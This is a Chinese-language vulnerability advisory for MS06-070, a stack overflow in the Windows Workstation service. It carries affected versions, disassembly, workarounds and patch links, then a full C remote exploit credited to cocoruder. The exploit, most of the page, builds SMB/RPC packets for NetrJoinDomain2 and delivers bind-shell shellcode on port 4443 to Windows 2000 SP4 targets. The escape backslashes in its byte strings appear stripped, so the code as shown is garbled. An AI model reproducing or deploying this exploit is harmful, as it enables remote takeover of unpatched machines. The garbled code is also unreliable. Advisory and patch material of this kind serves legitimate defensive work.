Microsoft 安全公告 MS06-070 Workstation 服务中的漏洞可能允许远程执行代码 (924270) 发布日期： 十一月 14, 2006 版本： 1.0 摘要 本文的目标读者： 使用 Microsoft Windows 的客户 漏洞的影响： 远程执行代码 最高严重等级： 严重 建议： 客户应立即应用此更新 经过测试的软件和安全更新下载位置： 受影响的软件： • Microsoft Windows 2000 Service Pack 4 — 下载此更新 • Microsoft Windows XP Service Pack 2 — 下载此更新 不受影响的软件： • Microsoft Windows XP Professional x64 Edition • Microsoft Windows Server 2003 和 Microsoft Windows Server 2003 Service Pack 1 • Microsoft Windows Server 2003（用于基于 Itanium 的系统）和 Microsoft Windows Server 2003 SP1（用于基于 Itanium 的系统） • Microsoft Windows Server 2003 x64 Edition BUGTRAQ ID: 20985 CVE(CAN) ID: CVE-2006-4691 Microsoft Windows是微软发布的非常流行的操作系统。 Windows的Workstation服务组件中存在栈溢出漏洞，远程攻击者可能利用此漏洞在服务器上执行任意指令。 在Workstation服务名为wkssvc.dll的模块中，NetpManageIPCConnect函数以未经检查的缓冲区数据调用了swprintf，而输入缓冲区是远程攻击者可控的。 .text:76781D67 mov edi, [ebp+arg_0] ... .text:76781D90 lea eax, [ebp+var_2CC] ... .text:76781DA0 push edi .text:76781DA1 push offset "%ws\IPC$" .text:76781DA6 push eax .text:76781DA7 call ds:swprintf NetpJoinDomain调用了这个函数，最终由NetrJoinDomain2函数通过RPC调用。 NetrJoinDomain2的IDL类似于： long _NetrJoinDomain2@28 ( [in][unique][string] wchar_t * arg_1, [in][string] wchar_t * arg_2, [in][unique][string] wchar_t * arg_3, [in][unique][string] wchar_t * arg_4, [in][unique] struct_C * arg_5, [in] long arg_6 ); arg_2包含有格式类似于<Domain name>+""+<Hostname>的字符串。 <Hostname>会用作NetpManageIPCConnect的第一参数。这个变量是攻击者可控的，最终传送给swprintf，导致栈溢出。 <*来源：JeongWook Matt Oh     Derek Soeder （dsoeder@eeye.com） 链接：http://secunia.com/advisories/22883     http://research.eeye.com/html/advisories/published/AD20061114.html     http://www.microsoft.com/technet/security/bulletin/ms06-070.mspx     http://www.us-cert.gov/cas/techalerts/TA06-318A.html *> 建议： 临时解决方法： * 在防火墙处阻断TCP端口139和445。 * 使用个人防火墙，如Windows XP所捆绑的Windows防火墙。 * 在支持高级TCP/IP过滤功能的系统上启用此功能。 * 在受影响的系统上使用IPSec来阻断受影响的端口。 厂商补丁： Microsoft --------- Microsoft已经为此发布了一个安全公告（MS06-070）以及相应补丁: MS06-070：Vulnerability in Workstation Service Could Allow Remote Code Execution (924270) 链接：http://www.microsoft.com/technet/security/bulletin/ms06-070.mspx 补丁下载： http://www.microsoft.com/downloads/details.aspx?FamilyId=3ad5c57d-d3f6-46a1-8dee-3e16d0977f80 http://www.microsoft.com/downloads/details.aspx?FamilyId=f4c8e767-4ed2-4e36-aa43-612f3017efc7 利用代码： CODE: /*************************************************************************** Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit by cocoruder(frankruder_at_hotmail.com),2006.11.15 page:http://ruder.cdut.net/default.asp Code fixed by S A Stevens - 17.11.2006 - changed shellcode, Changed code to correct jmp EBX address and fixed exploit output status. Greetz to InTel Should work on Windows 2000 Server SP4 (All Languages) usage: ms06070 targetip DomainName notice: Make sure the DomainName is valid and live,more informations see http://research.eeye.com/html/advisories/published/AD20061114.html, cocoruder just research the vulnerability and give the exploit for Win2000. ****************************************************************************/ #include <stdio.h> #include <windows.h> #include <winsock.h> #include <tchar.h> #pragma comment(lib, "wsock32.lib") unsigned char SmbNeg[] = "x00x00x00x2fxffx53x4dx42x72x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x88x05x00x00x00x00x00x0cx00x02x4ex54" "x20x4cx4dx20x30x2ex31x32x00"; unsigned char Session_Setup_AndX_Request[]= "x00x00x00x48xffx53x4dx42x73x00" "x00x00x00x08x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00xffxffx88x05x00x00x00x00x0dxffx00x00x00xff" "xffx02x00x88x05x00x00x00x00x00x00x00x00x00x00x00" "x00x01x00x00x00x0bx00x00x00x6ex74x00x70x79x73x6d" "x62x00"; unsigned char TreeConnect_AndX_Request[]= "x00x00x00x58xffx53x4dx42x75x00" "x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00xffxfex00x08x00x03x04xffx00x58x00x08" "x00x01x00x2dx00x00x5cx00x5cx00x31x00x37x00x32x00" "x2ex00x32x00x32x00x2ex00x35x00x2ex00x34x00x36x00" "x5cx00x49x00x50x00x43x00x24x00x00x00x3fx3fx3fx3f" "x3fx00"; unsigned char NTCreate_AndX_Request[]= "x00x00x00x64xffx53x4dx42xa2x00" "x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00" "x00x00x00x08x04x0cx00x08x00x01x18xffx00xdexdex00" "x0ex00x16x00x00x00x00x00x00x00x9fx01x02x00x00x00" "x00x00x00x00x00x00x00x00x00x00x03x00x00x00x01x00" "x00x00x40x00x40x00x02x00x00x00x01x11x00x00x5cx00" "x77x00x6bx00x73x00x73x00x76x00x63x00x00x00"; unsigned char Rpc_Bind_Wkssvc[]= "x00x00x00x92xffx53x4dx42x25x00" "x00x00x00x18x01x20x00x00x00x00x00x00x00x00x00x00" "x00x00x01x08xf0x0bx03x08xf7x4cx10x00x00x48x00x00" "x04xe0xffx00x00x00x00x00x00x00x00x00x00x00x00x4a" "x00x48x00x4ax00x02x00x26x00x01x40x4fx00x5cx50x49" "x50x45x5cx00x05x00x0bx03x10x00x00x00x48x00x00x00" "x00x00x00x00xd0x16xd0x16x00x00x00x00x01x00x00x00" "x00x00x01x00x98xd0xffx6bx12xa1x10x36x98x33x46xc3" "xf8x7ex34x5ax01x00x00x00x04x5dx88x8axebx1cxc9x11" "x9fxe8x08x00x2bx10x48x60x02x00x00x00"; unsigned char Rpc_NetrJoinDomain2_Header[]= "x00x00x00xa8xffx53x4dx42x25x00" "x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00" "x00x00x00x08x6cx07x00x08xc0x01x10x00x00x54x00x00" "x00x00x04x00x00x00x00x00x00x00x00x00x00x00x00x54" "x00x54x00x54x00x02x00x26x00x00x40x65x00x00x5cx00" "x50x00x49x00x50x00x45x00x5cx00x00x00x00x00x05x00" "x00x03x10x00x00x00x54x00x00x00x01x00x00x00x3cx00" "x00x00x00x00" "x16x00"   //opnum,NetrJoinDomain2 "x30x2ax42x00" "x0ex00x00x00" "x00x00x00x00" "x0ex00x00x00" "x5cx00x5cx00x31x00x37x00x32x00" "x2ex00x32x00x32x00x2ex00x35x00x2ex00x34x00x31x00" "x00x00" "x10x01x00x00" "x00x00x00x00" "x10x01x00x00"; unsigned char Rpc_NetrJoinDomain2_End[]= "x00x00x00x00" "x00x00x00x00" "x00x00x00x00" "x01x00x00x00"; unsigned char *lpDomainName=NULL; DWORD   dwDomainNameLen=0; /* win32_bind - EXITFUNC=seh LPORT=4443 Size=344 Encoder=PexFnstenvSub http://metasploit.com */ unsigned char shellcode[] = "x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xe9" "x59x23xcex83xebxfcxe2xf4x15x33xc8x83x01xa0xdcx31" "x16x39xa8xa2xcdx7dxa8x8bxd5xd2x5fxcbx91x58xccx45" "xa6x41xa8x91xc9x58xc8x87x62x6dxa8xcfx07x68xe3x57" "x45xddxe3xbaxeex98xe9xc3xe8x9bxc8x3axd2x0dx07xe6" "x9cxbcxa8x91xcdx58xc8xa8x62x55x68x45xb6x45x22x25" "xeax75xa8x47x85x7dx3fxafx2ax68xf8xaax62x1ax13x45" "xa9x55xa8xbexf5xf4xa8x8exe1x07x4bx40xa7x57xcfx9e" "x16x8fx45x9dx8fx31x10xfcx81x2ex50xfcxb6x0dxdcx1e" "x81x92xcex32xd2x09xdcx18xb6xd0xc6xa8x68xb4x2bxcc" "xbcx33x21x31x39x31xfaxc7x1cxf4x74x31x3fx0ax70x9d" "xbax0ax60x9dxaax0axdcx1ex8fx31x32x95x8fx0axaax2f" "x7cx31x87xd4x99x9ex74x31x3fx33x33x9fxbcxa6xf3xa6" "x4dxf4x0dx27xbexa6xf5x9dxbcxa6xf3xa6x0cx10xa5x87" "xbexa6xf5x9exbdx0dx76x31x39xcax4bx29x90x9fx5ax99" "x16x8fx76x31x39x3fx49xaax8fx31x40xa3x60xbcx49x9e" "xb0x70xefx47x0ex33x67x47x0bx68xe3x3dx43xa7x61xe3" "x17x1bx0fx5dx64x23x1bx65x42xf2x4bxbcx17xeax35x31" "x9cx1dxdcx18xb2x0ex71x9fxb8x08x49xcfxb8x08x76x9f" "x16x89x4bx63x30x5cxedx9dx16x8fx49x31x16x6exdcx1e" "x62x0exdfx4dx2dx3dxdcx18xbbxa6xf3xa6x19xd3x27x91" "xbaxa6xf5x31x39x59x23xce"; DWORD   fill_len_1 =0x84c;   //fill data DWORD   fill_len_2 =0x1000;   //fill rubbish data DWORD   addr_jmp_ebx=0x77F92A9B;   //jmp ebx address,in ntdll.dll unsigned char code_jmp8[]=     //jmp 8 "xEBx06x90x90"; unsigned char *Rpc_NetrJoinDomain2=NULL; DWORD   dwRpc_NetrJoinDomain2=0; unsigned char recvbuff[2048]; void showinfo(void) { printf("Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploitn"); printf("by cocoruder(frankruder_at_hotmail.com),2006.10.15n"); printf("page:http://ruder.cdut.net/default.aspnn"); printf("Code fixed by S A Stevens - 16.11.2006n"); printf("Should work on Windows 2000 Server SP4 (All Languages)nn"); printf("usage:n"); printf("ms06070 targetip DomainNamenn"); printf("notice:n"); printf("Make sure the DomainName is valid and live,more informations seen"); printf("http://research.eeye.com/html/advisories/published/AD20061114.html,n"); printf("cocoruder just research the vulnerability and give the exploit for Win2000.nnn"); } void neg ( int s ) { char response[1024]; memset(response,0,sizeof(response)); send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0); } void MakeAttackPacket(char *lpDomainNameStr) { DWORD j,len,b_flag; dwDomainNameLen=(strlen(lpDomainNameStr)+2)*2; lpDomainName=(unsigned char *)malloc(dwDomainNameLen); memset(lpDomainName,0,dwDomainNameLen); MultiByteToWideChar(CP_ACP,0,lpDomainNameStr,-1,(LPWSTR)lpDomainName,dwDomainNameLen); *(unsigned char *)(lpDomainName+dwDomainNameLen-2)=0x5C; *(unsigned char *)(lpDomainName+dwDomainNameLen-4)=0x5C; len=dwDomainNameLen+   //DomainName fill_len_1-3*2+     //fill_len_1 4+       //jmp 8 4+       //addr jmp ebx sizeof(shellcode)-1+   //shellcode fill_len_2+     //fill_len_2 2;       //0x0000 b_flag=0; if (len%2==1) { len++; b_flag=1; } dwRpc_NetrJoinDomain2=sizeof(Rpc_NetrJoinDomain2_Header)-1+     len+     sizeof(Rpc_NetrJoinDomain2_End)-1; //end //malloc Rpc_NetrJoinDomain2=(unsigned char *)malloc(dwRpc_NetrJoinDomain2); if (Rpc_NetrJoinDomain2==NULL) { printf("malloc error!n"); return; } //fill nop memset(Rpc_NetrJoinDomain2,0x90,dwRpc_NetrJoinDomain2); j=sizeof(Rpc_NetrJoinDomain2_Header)-1; //update para1 length *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x0c)=len/2; *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x04)=len/2; //copy header memcpy(Rpc_NetrJoinDomain2,Rpc_NetrJoinDomain2_Header,sizeof(Rpc_NetrJoinDomain2_Header)-1); j=sizeof(Rpc_NetrJoinDomain2_Header)-1; //copy DomainName memcpy(Rpc_NetrJoinDomain2+j,lpDomainName,dwDomainNameLen); j=j+dwDomainNameLen; //calculate offset j=j+fill_len_1-3*2; //jmp 8 memcpy(Rpc_NetrJoinDomain2+j,code_jmp8,sizeof(code_jmp8)-1); j=j+4; //jmp ebx address *(DWORD *)(Rpc_NetrJoinDomain2+j)=addr_jmp_ebx; j=j+4; //copy shellcode memcpy(Rpc_NetrJoinDomain2+j,shellcode,sizeof(shellcode)-1); j=j+sizeof(shellcode)-1; //fill data memset(Rpc_NetrJoinDomain2+j,0x41,fill_len_2); j=j+fill_len_2; //0x0000(NULL) if (b_flag==0) { Rpc_NetrJoinDomain2[j]=0x00; Rpc_NetrJoinDomain2[j+1]=0x00; j=j+2; } else if (b_flag==1) { Rpc_NetrJoinDomain2[j]=0x00; Rpc_NetrJoinDomain2[j+1]=0x00; Rpc_NetrJoinDomain2[j+2]=0x00; j=j+3; } //copy other parameter memcpy(Rpc_NetrJoinDomain2+j,Rpc_NetrJoinDomain2_End,sizeof(Rpc_NetrJoinDomain2_End)-1); j=j+sizeof(Rpc_NetrJoinDomain2_End)-1; } void main(int argc,char **argv) { WSADATA   ws; struct sockaddr_in server;   SOCKET   sock; DWORD   ret; WORD   userid,treeid,fid; WSAStartup(MAKEWORD(2,2),&ws);   sock = socket(AF_INET,SOCK_STREAM,0);   if(sock<=0) {     return; }   server.sin_family = AF_INET;   server.sin_addr.s_addr = inet_addr(argv[1]);   server.sin_port = htons((USHORT)445); printf("[+] Connecting %sn",argv[1]);   ret=connect(sock,(struct sockaddr *)&server,sizeof(server)); if (ret==-1) { printf("Connection Error, Port 445 Firewalled?n"); return; } neg(sock); recv(sock,(char *)recvbuff,sizeof(recvbuff),0); ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0); if (ret<=0) { printf("send Session_Setup_AndX_Request error!n"); return; } recv(sock,(char *)recvbuff,sizeof(recvbuff),0); userid=*(WORD *)(recvbuff+0x20);     //get userid memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0); if (ret<=0) { printf("send TreeConnect_AndX_Request error!n"); return; } recv(sock,(char *)recvbuff,sizeof(recvbuff),0); treeid=*(WORD *)(recvbuff+0x1c);     //get treeid //send NTCreate_AndX_Request memcpy(NTCreate_AndX_Request+0x20,(char *)&userid,2); //update userid memcpy(NTCreate_AndX_Request+0x1c,(char *)&treeid,2); //update treeid ret=send(sock,(char *)NTCreate_AndX_Request,sizeof(NTCreate_AndX_Request)-1,0); if (ret<=0) { printf("send NTCreate_AndX_Request error!n"); return; } recv(sock,(char *)recvbuff,sizeof(recvbuff),0); fid=*(WORD *)(recvbuff+0x2a);     //get fid //rpc bind memcpy(Rpc_Bind_Wkssvc+0x20,(char *)&userid,2); memcpy(Rpc_Bind_Wkssvc+0x1c,(char *)&treeid,2); memcpy(Rpc_Bind_Wkssvc+0x43,(char *)&fid,2); *(DWORD *)Rpc_Bind_Wkssvc=htonl(sizeof(Rpc_Bind_Wkssvc)-1-4); ret=send(sock,(char *)Rpc_Bind_Wkssvc,sizeof(Rpc_Bind_Wkssvc)-1,0); if (ret<=0) { printf("send Rpc_Bind_Wkssvc error!n"); return; } recv(sock,(char *)recvbuff,sizeof(recvbuff),0); MakeAttackPacket((char *)argv[2]); memcpy(Rpc_NetrJoinDomain2+0x20,(char *)&userid,2); memcpy(Rpc_NetrJoinDomain2+0x1c,(char *)&treeid,2); memcpy(Rpc_NetrJoinDomain2+0x43,(char *)&fid,2); *(DWORD *)Rpc_NetrJoinDomain2=htonl(dwRpc_NetrJoinDomain2-4); *(WORD *)(Rpc_NetrJoinDomain2+0x27)=dwRpc_NetrJoinDomain2-0x58; //update Total Data Count *(WORD *)(Rpc_NetrJoinDomain2+0x3b)=dwRpc_NetrJoinDomain2-0x58; //update Data Count *(WORD *)(Rpc_NetrJoinDomain2+0x45)=dwRpc_NetrJoinDomain2-0x47; //update Byte Count *(WORD *)(Rpc_NetrJoinDomain2+0x60)=dwRpc_NetrJoinDomain2-0x58; //update Frag Length ret=send(sock,(char *)Rpc_NetrJoinDomain2,dwRpc_NetrJoinDomain2,0); if (ret<=0) { printf("send Rpc_NetrJoinDomain2 error!n"); return; } printf("[+] Sent attack packet successfully, Try telnet on %s:4443?n",argv[1]); recv(sock,(char *)recvbuff,sizeof(recvbuff),0); closesocket(sock); } // milw0rm.com [2006-11-17]

OVER